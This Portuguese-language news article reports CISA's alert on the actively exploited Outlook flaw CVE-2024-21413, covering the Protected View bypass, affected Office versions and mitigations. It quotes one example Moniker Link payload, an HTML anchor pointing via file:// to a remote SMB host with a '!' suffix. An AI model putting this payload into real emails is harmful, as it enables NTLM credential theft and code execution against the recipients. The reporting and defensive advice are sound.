A Agência de Segurança Cibernética e de Infraestrutura dos EUA (CISA) alertou sobre a exploração ativa de uma vulnerabilidade crítica no Microsoft Outlook, identificada como CVE-2024-21413. A falha, descoberta pelo pesquisador Haifei Li, da Check Point, permite a execução remota de código (RCE), comprometendo sistemas através de e-mails com links maliciosos.
Microsoft Outlook enfrenta falha crítica explorada em ataques RCE
Como funciona a vulnerabilidade
O problema está relacionado à validação inadequada de entrada ao abrir e-mails que contêm links maliciosos. O erro permite que atacantes contornem o Modo de Exibição Protegido, uma camada de segurança que impede a execução de conteúdo prejudicial ao abrir arquivos do Office em modo somente leitura. Dessa forma, os arquivos são carregados diretamente no modo de edição, facilitando a execução de comandos maliciosos.
Além disso, o Painel de Visualização do Outlook também é um vetor de ataque, permitindo a exploração da falha apenas ao visualizar um documento malicioso.
Exploração por meio do Moniker Link
A Check Point detalhou como hackers utilizam um método conhecido como Moniker Link para contornar as proteções do Outlook. Eles incorporam links maliciosos em e-mails usando o protocolo “file://” e adicionam um ponto de exclamação após a extensão do arquivo para enganar o sistema de segurança. Um exemplo disso seria:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
Dessa forma, arquivos do Office modificados podem ser explorados para roubo de credenciais NTLM e execução de código malicioso.
Produtos afetados e impacto
A falha impacta diversas versões do Microsoft Office, incluindo:
- Microsoft Office LTSC 2021
- Microsoft 365 Apps for Enterprise
- Microsoft Outlook 2016
- Microsoft Office 2019
Ataques bem-sucedidos explorando essa vulnerabilidade podem resultar na execução arbitrária de códigos maliciosos e roubo de credenciais, afetando empresas e usuários individuais.
Ação da CISA e recomendações
A CISA incluiu o CVE-2024-21413 em seu catálogo de Vulnerabilidades Exploradas Conhecidas (KEV) e determinou que agências federais dos EUA corrijam a falha até 27 de fevereiro, conforme a diretriz Binding Operational Directive (BOD) 22-01.
Para mitigar riscos, é recomendável:
- Aplicar as correções de segurança disponibilizadas pela Microsoft.
- Desativar o Painel de Visualização no Outlook.
- Restringir o uso do protocolo “file://” em ambientes corporativos.
- Monitorar atividades suspeitas relacionadas a documentos do Office.
Embora o alerta seja voltado para agências governamentais, empresas privadas também são fortemente recomendadas a aplicar as atualizações e reforçar suas medidas de segurança para evitar comprometimentos.
Com o aumento das ameaças cibernéticas, a aplicação rápida de patches e boas práticas de segurança são fundamentais para proteger sistemas e dados contra ataques em evolução.